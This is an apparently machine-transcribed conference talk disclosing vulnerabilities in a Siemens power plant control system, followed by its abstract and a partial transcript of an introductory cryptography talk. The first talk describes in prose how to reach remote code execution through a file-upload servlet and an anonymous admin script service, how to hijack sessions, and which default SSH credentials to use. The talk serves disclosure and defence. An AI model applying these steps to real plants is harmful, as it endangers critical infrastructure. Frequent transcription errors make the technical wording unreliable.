the unique passwords for all power plants but until this year it was kind of hard to change this password so you need to be aware of how to do this you need to know the process you maybe need to contact your system integrator to do this starting up from this December it would be much easier specifically to change passwords so it's in the past even if you know you have these issues you are not able to simply change all these things. Along with the passwords you can find like the full diagrams and integrator documentation that can like show you how the system is built how it's operating specific accounts etc. And of course this was not published by Siemens those some power plant operators who thought it would be a good idea to share this information. So as I said the most important thing of the application server is a bunch of Java applications and please welcome Radu who will share the details about this. Hi everyone let's look how SPF software works on an application server operator can communicate with systems through a thin client and fed client. A thin client acts as Java player inside internet explorer browser and communicate with server through HTTPS so it can be outside of application network and its communications can be constrained by firewall. In opposite in case of fed client software should be installed on operator machine and client directly communicates with RMI registry to find services and after that directly communicates with this RMI services. So fed client should belong to application network. Illustration of SPF architecture was kindly provided by SPPA through the URL. Not to be missed let's divide it into spaces in red zone the items that process request from thin client and redirect them to RMI services. And in green zone there are RMI services which act as network services on dynamic TCP ports. SPPA consists of containers each container can encapsulate inside one or more RMI services. All type of containers are represented on illustration and all of them have self-explanatory names. Before we go deep inside internals of SPPA let me introduce some tools which used in this research. First of all all JARs files inside SPPA are up to skated with commercial product but the security measure can be easily bypassed by public available tool, the investigator. Sometimes it is useful to see how ledger search where communicates with system. It helps to understand architecture of system and workflow of clients. In case of SPPA RMI detector was written. It represents RAL TCP streams in human readable formats. Inside it use method read object from JavasDK. And it is known that this method is unsafe to insecure digitalization. So be careful not to be exploited through remote pickup. The first pillar of SPPA is patch web server according it config folder auto software config can be accessed by unauthorized user. In fact this folder contains some sensitive information of system for example files PC system configuration data XML and files inside AFC contain start up options and configuration of all containers either application network or automation network. Else configuration of oriental application in Tomcat also can be accessed using this vulnerability. And about Tomcat. There are three web applications registered remote diagnostic viewer, manager and orient. According to configurations of Tomcat and Apache web server as orient serverlets can be accessed through HTTPS. And in the file web.xml there are list of all serverlets of orient application and the list is really huge. So some of these serverlets have attractive name for attacker for example browserlet. In fact it allows an authorize user, listing directories of operation system. Right in case of exploitation another serverlet is more attractive. File upload serverlet allows unauthorized file upload with system right. Parameters base dir and target name fully control the name of the file. So this vulnerability can be easily transformed to remote code execution. You can override some start up scripts of SPPA or simply inject the SPL in Tomcat web application and get remote code execution with system right. Else there are some serverlets which contains word service factory in the names. In fact they redirects HTTP request to RMI services. Right they passed parameters for HTTP request and search desirable RMI service according to parameter service URL and further invoke call to the public method of security service and the name of the method defined in serialized object in the data section of HTTP request. There are parameters of this calls also defined in this object. So now we have situation when theme client and fed client can access RMI services. But in case of fed client it can also directly communicate with RMI registry. So if application server missed some important data security updates it contains insecure digitalization vulnerability and using public to your serial we can simply exploit it and get code execution with system right again. The next task will be to list all available RMI services of SPPA system. This first step we simply use class locate registry of Java SDK and get big list of services. All but one are the mix RMI services. I assume that they perform some general interface for common for control and manage containers of SPPA. And first investigation we only choose lookup service. In fact this service looks like some collection of another RMI services using its public method list. We get the name of all available services and using the name and public method lookup we get the reference of RMI service. All RMI services in this step implement interface service factory. So according this we can assume that this is again collection of another RMI services but in fact it doesn't have public method to get the name of the service. So we need to decompile. So we need to decompile the class and find some factory methods which create RMI service for example create admin script and inside we can find the name of created service. As it can be guessed it's admin service. So using public method get service and this name we finally get the reference to next level RMI service. And in final step we get the reference to RMI services which perform real job of SPPA. But it's this RMI service also contains a lot of public methods for an authoritative user. So to sum up which refers registry and at each level we found a lot of RMI services and the last item also contains a lot of public methods. So the attack surface of SPPA system is really huge. So now when we list all available RMI services the next question is how does authentication of client request performs on the system. To answer this question let's look how client request to security service process on system. First of all client gets the reference to security service using some client ID. Further PC service factory try to get valid session using this client ID in session method manager. If session manager will failed in his task the exception will be throat and client will be failed. But if it succeeds valid session ID will return to PC service factory. And further in its turn instance of security service will be created in factory method and value of session ID will be stored in a login ID inside security service. And finally client will get the reference to security service. Further he can call some public method of it. But this methods can perform privilege checks of user using login ID in security manager. So to sum up we have two security measures in this system but there is a question how user client can perform login operation if he doesn't have any valid client ID. In this case at start up of the system session manager will be added an anonymous session with client ID equals zero and client will use this client ID and perform login operation. But attacking can also use this feature and simply bypass first log. So to sum up there is only one security measure on the system and it fully delegated to met it of remote services. But amount of remote services is huge. Amount of public methods is really huge and so it become really difficult to manage security service of system according to this information. So we know all inputs of system. We know all possible security measures of system. So it's time to find vulnerabilities. In the list of remote services there is one which looks some attractive. It's admin service. It can be accessed with anonymous session inside it has public method run script. This method doesn't perform any privilege checks so we can call it without any credentials and so on. But first step this method create instance of class loader using bytes from arguments and in fact this step will load arbitrary Java class. This class should implement interface admin script and defined method execute and this method execute will be called by run script of remote services. For this case we create Java class that simply run OS command from arguments of run script and we get code execution on system with system right. Of course there is more powerful post exploitation of this vulnerability than simply run OS command. You can, this vulnerability allows inject arbitrary Java class inside running SPPA application. So you can use some Java reflection to patch some variables of system and have influence of on technological process of SPPA. Also privilege check inside methods of remote service can be bypassed with second vulnerability in session service. This service has public method get login sessions. In fact this method return session data of all login users on system. This information includes user names, IP and client ID. So if in this amount this client ID of user that has some admin privileges, attacker can use this client ID to get reference to security service and this reference will be with some more privileged session. Further, attacker can call public method of security service, get all users and get all private information about all users of the system and password hashes also included in this private information. So to sum up, we have two, both of these vulnerabilities can be accessed through HTTPS and firewalls. Rules can be bypassed. In general all communication with remote services are encrypted. So user names and password hashes are transferred in plain text. This is more critical for Fed client case. So moreover password hashes doesn't perform any, doesn't have any session protection mechanism so if attacker can perform man in the middle attack against some user of this pipeline and capture the traffic between this user and application server, he can get valid username and password hash of the system and simply reuse this credentials and perform login operation on the system. Moreover, he also can change the password of this user. I talk a lot about user names and password hashes so it's time to understand how these items are organized on the system. Alex? Hello everyone. Let's continue our discussion about application server. On the previous slide you can see how remote authentication works. And now I'm going to tell you about how it's organized locally. After the system gets started, it begins to read two files, user1.xml and pdata1.exe to get user list and the password respectively. The user1 file is a simple xml while pdata1 has a slightly more difficult structure. It's a gzparkive encoded in base 64, the right driver civilization object in the gzparkive containing a specific xml. The field of the xml presents on the slide. They are used to calculate hash value and check password during the authentication. On the bottom of the slide you can see password check algorithm in pseudocode. The graph is typical for the script hash scheme like in your Linux and Linux machine. It has a number of iterations, soles and the only one thing that was added is hard code itself which is the same for all user. The tool to extract password hashes and the parameters from the pdata1 file has been developed. On the slide you can see its output. The tool can be used during the password auditing to check password, the check week or dictionary password and the hash calculation parameters. The tool is available at the link below. It draws a line and applications analysis. First as we have seen, attack surface is really huge and includes a lot of different components. Secondly, it's about remote connections. Whether the SPPA has no remote connections according to vendors or someone else who told you it, you should check it anyway. The last thing is attacker has an opportunity to impact power generation process. For example, it can start stop generation, change some output value or get some additional information about generation process and all this action can be done from application server. It's all about application server and let's start discussion about automation. The main goal of the automation server is to execute real-time automation functions and tasks. Depending on the power plant project architecture and its features, the role of the automation server can be different. We have distinguished three roles. The first one is automation role. There may be slight confusion because the term is used both for server and for its role. But analyzing automation server configuration and publicly available information, we have found that whatever the role is, almost the same hardware and software are used and we have decided to use this kind of classifications. It seems less confusing to us. At the same time, it's different from the vendor classification. Anyway, meaning automation role, having automation role means that the server is responsible for interaction with input output modules, which control and monitor power plant equipment such as turbine, electric generator, some other. The second role is communication. In this role, this role is used for connection the third-party software and system. In other words, it's just a protocol conventer supporting such protocols as Modbus, IEC, 101, 104 and some other. In the last role is the migration role. This role is used to connect previous versions of SPPA T3000 and other legacy systems such as SPPA T2000 or Teleperum ME. Automation role in automation server can be run on CMATIC 7 PLC and an industrial PC. Now let's talk a little more about each role. Let's start with automation role based on PLC. PLC will directly control devices like walls in turbine and access to them. Access to them is a game over for any security discussion. They usually represent the lowest level in different reference models such as Purdue model for example, any configuration changes and updates for PLC require to stop technological process. So these devices always have security misconfiguration firmware without security updates and unsecure industrial protocols. In case of SPPA, they are S7 protocols LPC data. We have a lot of information about S7 protocols in the Internet but not so much about PLC data protocol. So we had to deal with it and analyze ourselves. It's not a special protocol for SPPA when you program your CMATIC PLC and need to exchange some data between them in real time. You use this protocol. It's quite simple protocol and maybe its description is available somewhere in the Internet but we couldn't find it. So just a case show you its structure. Anyway there are no security mechanisms in this protocol. So only obstacle while do the main in the middle attack to spoof data is the sequence number which we can get from a packet and just fasts the implementation. For protocol analysis we have developed a de-sector which is available at the link below. During the security assessment of PLC configurations, one of the main things which we check is unauthorized access to reading and writing PLC memory. Security of unauthorized access is determined by position of the mode selector of the PLC and some other configuration parameters. During the previous research conducted one of our colleague Daniel Parnichev, the privilege matrix has been obtained. They show unsecured states and configurations of PLCs. The tool for gathering information from the PLC over the network and its analysis has been developed by Daniel and also available in our repository. Now let's talk about application server based on industrial PC. It's just a Linux box. During the start it tries to download some additional files from the application server. This file includes jar files, bar scripts, some configuration protocols files and some other. In order to execute jar files, the PTC per virtual machine is used. It's a runtime Java machine widely spread in industrial, IOT and military area. PTC per contains a head of time compilation mechanism. As a result jar files contains byte code transformation. That's why regular decompiles fails with them. To solve this problem we have written a PHP script to perform reverse transformation. After that regular decompiles have been successful. Running jars open RMI services on the automation server and some there extension. For example in case of migration server, the Orion RPC services which are extension of classic Java RMI services are used. On the slide you can see the list of these services. The security issues of automation server based on industrial PC are presented on the slide. Firstly as you can see there is a possibility to spoof downloaded files from application server. The files downloaded over HTTP and there are no security mechanism during the process. Secondly it's about default credentials. You can get access over SSH to server with user CM admin and password CM. Next it's vulnerabilities in Orion RPC services. These vulnerabilities allow to perform sensitive data explosion and remote execution. And finally the last group is vulnerabilities found in the software used to fill a migration role for communication with SPP 80 2000 also known as TXP system. With a number of issues on immigration server with old TXP you are not in magic position will be. A few words about Orion RPC vulnerabilities. They are in runtime engineering service. This service contains request runtime container method where the first argument defines the action to be executed. Using the action read file it's possible to get content of any file from the system. Using the write config file it's possible to write any information to the server. And for example it can be a JAR file which execute a shell comment from the comment line and using some SPPA specific functions you can execute these JAR files later. That's all about automation server. To sum up automation server can be based on PLC or industrial PC. In case of PLC it's the simple PC, it's the usual PLC with known security issues. In case of industrial PC it's just a Linux box which try to download some additional files from the application server and some of them execute with per virtual machine. So far we haven't mentioned any network equipment using distributed control system. In the research we saw a wide variety of network devices and network infrastructure including switches, firewalls and more rare devices such as data diet for example. We try to summarize all this information and got a common SPPA network topology. We have shown in a couple of places of network devices but the same devices can be found in other vendors distributed control system. Network devices in industrial network usually have a lot of security issues. The reason for this is that most of them don't require any configuration before start and can be run out of the box. And that's why the things like guestable SNMP community string with credentials for different services firmware with publicly available exploits and just a lack of security configurations. All the things are usual for network devices and they are usual security issues for industrial network. I think that's all. Now Gleb to sum up our discussion. So the topic of power plants is huge. The system is huge and we try to cover this and that sort of small things in the talk and everything can be summed up on this slide. These are just vulnerabilities as you can see problems in Java, in web applications, in different simple mechanisms that you can exploit to actually directly even not go into the PLCs or field level you can impact the process itself. What we don't cover in this talk is actually what's like havoc or disaster could be caused by attacking such systems because it's actually not that bad. I mean, if we are talking about things like blackouts of the cities or things like this, this is not what you can do with attack on such system because the distribution of the power in the grid is not the, according to the threat model, is not the problem of the power generation. It should be like another regulator who should watch for enough capacity in the network to fill the electricity to the customers. So what we are really speaking here is how we can impact the, for example, the turbine, the turbine itself, for example. But we had no access to the real turbine. They're big expensive and we haven't found anyone willing to provide us one, so we would destroy it. But the point is we have an educated guess, like PLCs, they control a lot of parameters of this turbine and the turbine is like a big mechanical monster that is actually self-degrading by working and putting it into different like uncomfortable operating modes will degrade it even faster or it will break it. And it's not easy. You can have a spare PLC or some other device, you won't have a spare turbine. So the impact is there, but it's not like very huge. So what we tried to do with this research mostly is like to understand how we can help the power plant operators out there and we have to find out all the issues and analyzing like this infrastructure on the customer side. We understood that all of the installations are actually the same and we can write a very simple do-it-yourself assessment and hopefully even like engineers on the power plants can test themselves. It is very easy like set of steps on two or three pages. You connect to application network, you connect to the automation network, you run the tests, you get the results and afterwards you talk with Siemens or you can fix something by yourselves and basically you don't have to hire like expensive consultants to do the job. You should be able to do it by yourself. I hope that you will be able to do it. Of course, to summarize the whole situation around DCSs, it is if you have seen other industrial solutions like SCADA stations, anything actually, you would find a lot of similarities and the whole, it will have the same pain points as all other solutions. There is a good document from the IAC 62443 which describes how like power plant operator or asset owner should talk to the system integrator and in the vendor with the vendor in terms of what security they should require and how they should control it. We urge any power plant operator to read this standard and to require security from their vendors and system integrators because nowadays it depends from vendor to vendor. The vendor is more interested in the security of the plant or some regulator and nobody knows how to act. This is the document where, which describes how you should talk with all other entities. Of course, read the slides or read the white paper in January, call Siemens, update all systems, change your passwords and configurations. This is actually very easy to, at least to shrink the attack surface. A lot of things inside SPPAT-3,000 network is a modern Windows boxes and it's kind of easy to set up some form of monitoring. You should talk to your security operations center. They would be able to look for some logs. Most of the impact that we showed, it was the impact from the Java applications and you won't be able to monitor this with security events and Windows, but at least it's still some form of detection process inside your network. Again, finally to summarize, it is not like a problem of one DCS from Siemens. There are exactly the same issues for other vendors not mentioned here. We will release a lot of things today, tomorrow and in January. Basically like the big white paper about everything that we found out with recommendations, what to do with the word lists, with the do-it-yourself security assessments, with a lot of tools. One of the tools would help you to do the research and other tools would help you, for example, if you're using intrusion detection systems like IDSS, you would be able to parse the protocols and maybe write some signatures for that. We work closely with Siemens. We want to say thank you for the Siemens product search. They did a great job in communications between us and the product team that develops the products of the Siemens SPPAT-3,000 itself. The main outlines from the vendor response is that if you are power plant operator, you should hurry and install a new version 8.2 SP2. There are Siemens is trying to educate and raise awareness inside their customers that first of all, they should change passwords, that there are critical vulnerabilities and they should do something with it. There is not all the problems are fixable by Siemens themselves. There is an operator is viable for some of the activities to do to the security by themselves. That's actually it. Thank you. Thank you very much. Thank you, Congress. If you have any questions, please welcome. Thank all of you for this excellent talk. We have a short three minutes for questions. If you have questions, please line up at the microphones and hall. If you are using hearing aids, there is an induction loop at microphone number three. Do we have questions from the internet? Yes. A question from our signal angel, please. We have a question. With the vulnerabilities found, could you take over those plans from the World Wide Web without further manding the middle attacks? Can you please repeat? A little bit louder, please. Sorry. With the vulnerabilities found, could you take control over those plans without worldwide from public internet without further manding the middle attacks? Actually no, this is some form of good news. As those systems are exclusively supported by one system integrator, by Siemens, they are more or less protected from the external access. Of course, there would be external access, but it's not that easy to reach it. Of course, we're not talking about internet. We're talking about some corporate networks or things like this. Next question, microphone three, please. Yes, hello. I also have a power plant on my planet and it's kind of bad for the atmosphere, I figured. My question is, can you skip back to where the red button is to switch it off? I'm asking for a friend. When I thought about that, these materials can be used in this way. Specifically, if you have operators or engineers friends on the power plant, you can talk to them. Do we have any more questions from the internet? No questions, any questions from the hall? I guess not. Well then, thank you very much for this talk and a warm round of applause. Thank you.
A deep dive into power generation process, industrial solutions and their security implications. Flavoured with vulnerabilities, penetration testing (security assessment) methodology and available remediation approaches. The research studies a very widespread industrial site throughout the world – power generation plants. Specifically, the heart of power generation – turbines and its DCS – control system managing all operations for powering our TVs and railways, gaming consoles and manufacturing, kettles and surveillance systems. We will share our notes on how those systems are functioning, where they are located network-wise and what security challenges are facing owners of power generation. A series of vulnerabilities will be disclosed along with prioritisation of DCS elements (hosts) and attack vectors. Discussed vulnerabilities are addressed by vendor of one of the most widespread DCS on our planet. During the talk we will focus on methodology how to safely assess your DCS installation, which security issues you should try to address in the first place and how to perform do-it-yourself remediation. Most of the remediation steps are confirmed by vendor which is crucial for industrial owners.
10.5446/53194 (DOI)
Now for the next talk, he has worked for six years in the field of cryptography for the Unikatsruhe, OZ. Okay, so thanks for the introduction and welcome to my talk. As our Herald just said, I've been working in the area of cryptography for the better part of the last six years, and I noticed that many people today have kind of a mental image of what cryptography is and what encryption is, but sometimes this mental image does not really coincide with what is actually going on. So I wanted to give an introductory talk to cryptography that is available to a broad audience, so to an audience that does not have any prior exposure to cryptography and maybe even to an audience that does not have a background in maths or computer science. So as I said before, this talk is specifically aimed at a non-technical audience, even though at 36C3 we probably have a fairly technical audience, and this is a foundation's talk. So I will not be speaking about fancy research or cutting edge results, I will be talking about the plain basics. Okay, so apart from working in cryptography, I enjoy doing applied cryptography, number theory and ponings, so exploiting all kinds of memory corruption bugs in programs. Okay, this is a picture of my parents' cats, just because every talk should have pictures of cats in them. And this is... Thanks. So this is my checklist for this talk. The first item, I think we already did that, and so for the remainder of the talk, I want to explain what encryption is, what it does and what it does not do. I want to explain authentication, which fixes a problem that encryption does not solve. I want to explain certificates because they help a lot with both encryption and authentication. And in the end, I want to explain a little how the things that I'm going to introduce work together and can be combined to build more useful things. Okay, so let's start with the first point here. I would like to explain encryption. So encryption is basically a solution to a problem, so let's talk about the problem before we get to the solution. The problem here is... Or one of the classical problems is that two parties want to communicate, so we cryptographers commonly call them Alice and Bob, and Alice wants to send a message to Bob. So in this case, it's just a very stupid message, just a simple hello, but cryptography has been used in diplomacy and military for hundreds of years, so imagine that this message is something more critical. And the problem we want to solve is that there might be an eavesdropper who is wanting to listen in on the connection and read the message, read the content that is being sent from Alice to Bob. And what some people think, how cryptography works, is something like the following, which is kind of close to the real thing, but not really, is that Alice applies some kind of encryption procedure to her plain text message to produce some random, unintelligible gibberish, which we call the ciphertext. And then Alice sends the ciphertext to Bob, and Bob has the decryption procedure, knows how to decrypt, so to invert the encryption procedure and recover the plain text message. And now, the point that some people get wrong is some people think that the knowledge how to decrypt is actually secret. But that is not true today. So in 1883, a person named August Kalkovs formulated a couple of principles that ciphers used for military applications should adhere to. And one of these requirements became well known as Kalkov's principle, and it reads, a cipher should not require secrecy, and it should not be a problem if the cipher falls into enemy hands. So rephrasing this a little, the cipher that you are using should be secure enough that you can even tell your enemy or the attacker how the encryption process is working and how the decryption process is working without harming the security of the encryption. Or to rephrase this yet another time, if the cipher you are using is so insecure that you cannot tell anyone how it works, then maybe you shouldn't be using it in the first place. So let's get back to this image. So now if the attacker knows how to decrypt the message, then obviously this very simple scheme does not yield anything useful. And so what people did is people introduced a key to this image. So now the encryption procedure and the decryption procedure use a key, which goes into the computation that is going on. So Alice does some kind of computation based on the message and the key to produce the cipher text and Bob, who has the same key, can invert this encryption operation and recover the plain text. However, as long as the key is only known to Alice and Bob, but not to the attacker, the attacker cannot use the decryption procedure. So one general word here, I will not go into the details of how these boxes operate. So within these boxes which represent computations, there is some math or computer science going on and I would like to not explain how these things operate internally in order to keep this talk available to a broad audience. Okay, so a problem that we have here is that Alice and Bob have to agree on the key in advance. So Alice cannot simply send over the key to Bob because if she did, then the attacker, who is eavesdropping on the connection, learns the key as well as the message and then the attacker could just decrypt the same as Bob. Okay, so this does not work. This is a terrible attempt. So for quite some years, actually until the 70s and 80s of the last century, people were only using this scheme and this is what we call symmetric encryption because we could just flip the image around and Bob could be sending a message to Alice instead because encryption and decryption uses the same key. And if there is symmetric encryption, you can guess there is something else which is called asymmetric encryption and there is, for asymmetric encryption, there is a pair of keys. One of them is used for encryption and one of them is used for decryption. And now if we have an asymmetric encryption scheme, we can do something like the following. So Bob generates a pair of these keys, one for encryption and one for decryption and he keeps the decryption key to himself. This is why the decryption key is called the secret key. However, Bob can publish the encryption key for everyone to see. So for example, it could be put in a kind of public registry like a phone book or whatever. And now Bob can send his public key to Alice and an eavesdropper who is listening in on the connection will learn the public key but that's not a problem because the key is public anyway. And now after we have done this, Alice can use Bob's encryption key to encrypt her message and send that over to Bob and now Bob can decrypt the message with his secret decryption key. However, the eavesdropper here cannot simply decrypt the message because even though the eavesdropper has the encryption key, it does not have the decryption key and the eavesdropper cannot decrypt. Okay. However this solution is still kind of risky. There is still a problem with this and it is we still have to make sure the keys are distributed in advance. So if we used the simple scheme where Bob is sending his public key to Alice, then there is a problem if the attacker is not simply passively eavesdropping on the connection but is willing to actively interfere with the connection. So for example, the eavesdropper might intercept the public key that Bob is sending to Alice and replace it with his or her own public key. And then Alice would think that the key she received belongs to Bob and use this key to encrypt her message to Bob and then suddenly the attacker can read the message again. So at this point, let's summarize about encryption. So encryption conceals the content of data. And this is pretty much what it does and pretty much the only thing that it does. In particular, it does not conceal the fact that there is communication going on. So an eavesdropper who is listening in on the connection obviously can see Alice sending a message to Bob and thus the eavesdropper knows there is communication going on between Alice and Bob. And this alone could be quite dangerous for Alice and Bob. So imagine if Alice was working for an intelligence agency and Bob was a journalist and the attacker sees Alice sending lots of documents to Bob, then this might be a strong indication that Alice is a whistleblower and Alice could be put into jail. So something more that is not concealed by encryption is the amount of data that is being exchanged. So if Alice is sending just a very short message to Bob, then the eavesdropper can guess that the message that is being transferred is not a 20 gigabytes file or something. So all this kind of metadata is something that encryption does not conceal. And there is a couple of more problems with encryption. One of them is that the attacker might change the message. Protecting from changes to the message is not the job of encryption. Another problem is that keys must be exchanged in advance, which I already talked about. And there are more problems. So for example, an attacker might simply record a message when it is sent and later just replay this message to Bob. Or an attacker might go ahead and block a message altogether, so intercept the message and throw it into the trash to make sure it never arrives at Bob's site. And the first problem here, an attacker might change the message, will actually lead me to the second part of my talk, which is authentication. So on my talk checklist, let's mark encryption as done. Okay. So now, what is authentication? Authentication enables the detection of changes to data. It does not prevent changes from happening. It only enables the recipient to detect the changes after they have happened. Okay. So for example, one example where something like authentication was needed is when Bob was sending his public key to Alice, but this is by far not the only scenario where authentication is needed. So imagine if Alice is running a charitable organization, so for example, she is saving refugees from drowning in the Mediterranean Sea, and Bob wants to donate to Alice to help her do that, then Alice has to send her bank account number to Bob so that Bob can make the donation. And notice that in this scenario, the message that Alice is sending to Bob, her bank account number, is nothing that is secret. It does not have to be encrypted because this information is public knowledge. However, we do want to make sure that the message that arrives at Bob is indeed the correct bank account number. So to prevent something like this from happening, where a criminal might intercept the message and replace the bank account number, so Bob would send his money to the criminal's bank account instead of Alice's. And one way to realize authentication is again by having a pair of keys. One of them is used for authentication, and one of them is used for verification, so checking if a message has been changed or not. And the authentication key must be kept secret, thus it is called the secret key, whereas the verification key can be made public, and it is called the public key. And now if you have a setup like this, then Alice can go ahead and take the message that she wants to send to Bob and apply some computation to it together with the secret key, the authentication key to produce something that we call a signature or a digital signature. And then Alice sends this signature over to Bob along with her bank account number, and Bob will take the signature that he receives and the bank account number he receives and apply some kind of computation to them, and this computation will determine if the bank account number has been changed or is in fact original. So if the attacker changes the bank account number, then Bob will be able to detect this change by checking the signature. And this holds even if the attacker does not only change the bank account number but also the signature. So these things are designed in a way which hopefully makes it impossible for any attacker to come up with a valid signature for anything else than the original message. Okay. So the only thing that Bob will, the only way that Bob will accept the signature is if the attacker does not in fact change the bank account number. And in this case, it is safe for Bob to transfer the money. Okay. But here, okay, so here is a different solution to this problem. And it's actually pretty much the same except that now we have just a single key which is used for both authentication and verification. And in this case, things simply have a different name. They work in exactly the same way except that the signature is called a message authentication code or MAC for short. Okay. But in both of these scenarios, whether we have two distinct keys or just one key, we still have the problem of key distribution. Okay. So imagine if in the scenario with two keys, Alice was sending her public key to Bob, then we would have the same attack as before. Namely the attacker could just go ahead and change the key that Alice is sending to Bob and exchange it for his own key. And so if the attacker is sending his own public key, his own verification key to Bob, then obviously the attacker can create a valid signature for his forged bank account number and Bob would accept this. Okay. So again, we have this problem of key distribution which is that the verification key must be known to Bob in advance. Okay. And this leads me to my next, the next section of my talk. So let's mark authentication as done and go on with certificates. So a certificate is a document that confirms that a specific public key belongs to a specific entity. It can be a simple person or an organization. And if we want to use certificates, let's just go back to the scenario we had before. So Alice wants to send her bank account number, her public key, and a signature for her bank account number to Bob. And an attacker might change the public key and the bank account number and the signature. And now if we add certificates into this, we need to add something that we call a certificate authority. This is a trusted third party which will create certificates which confirm the association between a person and a public key. So before Alice is sending a message to Bob, she will walk up to the certificate authority and say, hey, certificate authority, this is my public key. I'm Alice. Please give me a certificate. And then the certification authority will check that Alice is indeed Alice and that Alice indeed owns this public key. And if Alice passes these checks, then the certification authority will create a certificate and hand that to Alice. And this certificate is just a document which says that the certification authority has verified that the silvery key here on the slides belongs to Alice. And now once Alice has the certificate, she can just send her public key to Bob together with the certificate. And then Bob, if he knows the certificate authority's public key, can check that the certificate is indeed correct. So it was indeed created by the certificate authority. And if he trusts the certificate authority, he will know that the silvery key is in fact Alice's. And then afterwards, Bob will be convinced that the silvery key is Alice's and he can check the message that Alice is sending to Bob and make sure it has not been changed. Okay. So we're not completely free from the key distribution problem yet, however, because still Bob has to know the public key of the certification authority in advance. So Bob does not need to know Alice's public key in advance, but he needs to know the public key of the certification authority in advance. And in practice, there's not just a single certification authority, but there's a whole bunch of them, and certification authorities can even create certificates for other certification authorities and so on. So now Bob does not have to know all the public keys of everyone he's communicating with, but he only has to know the public keys of a couple of certification authorities. Okay. So let's summarize about certificates. So as I said before, certificates confirm that a specific public key belongs to a specific entity, like a person or an organization, but we're still not completely free from the key distribution problem because people have to know the certificate authority's public keys. And another problem here is that this scheme gives an enormous amount of power to a certification authority. So if an attacker can compromise a certification authority, then he could force the certification authority to create fake certificates connecting fake keys to real identities. So he could create a fake certificate which says that the certification authority has checked that the attacker's public key belongs to Alice. And fixing this problem about the certification authority's power is something that cryptographers are still working on. So that's still a problem today. And in fact, this problem is not just theoretical. There's a number of incidents that have happened with certification authorities. So one famous example is the DigiNOTAR case where, in fact, a certification authority named DigiNOTAR was hacked and the attacker has created a fake certificate for a Google.com domain or one of the other Google domains I don't exactly remember. And then these certificates showed up being used in Iran. Okay. So this is not just a theoretical problem. This has, in fact, happened before. Okay. So this concludes what I wanted to say about certificates. So let's move on and see how these things can be put together to build more complex but also more useful tools. So one of the tools I want to introduce is called authenticated encryption. And it's basically a combination of encryption and authentication. So for some reason, people use this phrase mostly in the symmetric case, so where there is one key for encryption and decryption and one key for authentication and for verification. But you could pretty much recreate the same scheme in an asymmetric fashion and that is also being done in practice. In this case, people just don't call it authenticated encryption. So one way to build authenticated encryption is, so if Alice wants to send a message to Bob, then she will encrypt the message using the encryption key and send the ciphertext over to Bob. And then she will use a copy of the ciphertext and compute a message authentication code from it using the second key that she has. And then Bob is, Alice is going to send over that message authentication code to Bob, too. And now Bob can decrypt the message using the key he has and additionally, Bob can check if this message has been changed or whether it is original by using the verification procedure. Okay. So, again, this kind of authentication does not prevent changes from happening, but Bob can check whether a change has happened. And in fact, this kind of authenticated encryption can actually boost the security of the encryption scheme. Okay. So another thing I wanted to talk about is called hybrid encryption. And this is a combination of symmetric encryption and asymmetric encryption. And the reason why this is interesting is that asymmetric encryption is usually quite slow compared to symmetric encryption. So if you wanted to send a very long message to Bob and you only had a public key encryption scheme, so an asymmetric encryption scheme, then it would take a very long time to encrypt the message and to decrypt the message. So however you can combine asymmetric encryption and symmetric encryption in a way that makes the encryption process faster, and the way you do this is so if Alice wants to send a message to Bob, Alice first generates a new key for the symmetric encryption scheme, and Alice will encrypt her message with this key and send the ciphertext over to Bob, and afterwards Alice will take the symmetric key that she has just generated and encrypt this key with Bob's public key. And then that is sent over to Bob as well. And now Bob can decrypt the symmetric key using his secret decryption key, the kind of golden one here on the slides, to recover the symmetric key, and afterwards Bob can use the freshly recovered symmetric key to decrypt the actual message. However a neistropper listening in on the connection cannot decrypt the message because it does not have the symmetric key, and it cannot decrypt the symmetric key because it does not have Bob's secret decryption key. Okay, so you can continue to build on these kind of things, and what you end up with is something called transport layer security, or TLS for short. And transport layer security is a network protocol that combines much of the things that I have introduced so far, so it combines encryption, either symmetric or hybrid, and it combines it with authentication, so max and signatures and certificates and all the other things, and it adds in a couple of more things to detect replays of messages. So if an attacker was to simply replay a message recorded earlier, this is something that TLS can detect, and TLS can also detect if a message has been suppressed by the attacker, so within a connection. So what TLS does is it kind of establishes a secure connection between two entities, so say Alice and Bob, over an insecure network, which is controlled by the attacker. And one application where TLS is commonly used is for sending emails, so for example, when you're sending an email from, say, Alice wants to send an email to Bob, then the email is usually not sent directly, but Alice sends the message to her own email server, and then Alice's email server will forward this email to Bob's email server, and when Bob goes online and checks his emails, the email will be downloaded to his device, like his phone or desktop computer or whatever device Bob is using. And while Alice can make sure that when she is uploading her email to her own server, that this connection is secure just by encrypting the message, so essentially using TLS and all the things that involves, like encrypting the message and authenticating the message and so on. However Alice cannot check if her own email server also uses a secure connection to forward this email to Bob's server. So let us take a more detailed look here. So each of these green locks signifies a secure connection. This means that when a message is sent, then, or each time a message is sent over a secure connection, there is some encryption and authentication going on on the sender side and some decryption and verification going on on the receiving side. So if Alice wants to send an email to Bob, then Alice will build up a secure connection and send the email over it, and this will involve encrypting the email and authenticating the email, and Alice's server will decrypt the email and verify that it has not been changed, and then Alice's server will forward the email to Bob's server, which involves again encrypting it and authenticating it, and Bob's server will decrypt and verify it. And then again the same process repeats when the email is sent or is downloaded by Bob from his server. However, in this case, so even though the message is encrypted every time it is sent over network, it is known in plain text by Alice's server and Bob's server, right? Because Alice is sending the message, so she's encrypting it, and Alice's server is decrypting it, so Alice's server can read the message in plain text. And the same goes for Bob's server. And this is what we call transport encryption, because the email is encrypted every time it is being sent over network. And a concept opposed to this is what we call end-to-end encryption, where Alice, before sending the message, Alice encrypts it, but not with a key that is known to her server, but directly with Bob's public key, and she might even sign it with her own secret authentication key. And then Alice sends this already encrypted message over a secure channel to her own server, which involves encrypting the message again and authenticating it again. And then Alice's server will decrypt the message and verify that it has not been changed. However, the server cannot remove the second layer of encryption, right? So the email is encrypted two times. One time was with Bob's key, and a second time so that the server can decrypt it. And now the server can remove the second encryption, but the first one is still there. So Alice's server cannot read the email. And then the process repeats. The already encrypted message is encrypted a second time and decrypted again at Bob's server. And then when it is downloaded by Bob, it is encrypted again and decrypted again. And then finally, Bob, who has the secret key, the secret decryption key, can remove the inner layer of encryption. And so Bob can read the message. However, the servers in between cannot read the message just because it is still encrypted with Bob's public key. Okay. So with that, I would like to wrap up. Sorry. So I would like to wrap up. So here are a couple of take home messages. So the first one is encryption conceals the content of data. And that's pretty much all it does. It does not conceal the metadata and it does not prevent the message that is being sent from being changed. That is the job of authentication. Authentication enables the detection of changes to data. And both for encryption and for authentication, you need to have pre-shared keys or maybe not really pre-shared keys, but key distribution has to happen beforehand. And one way to make this 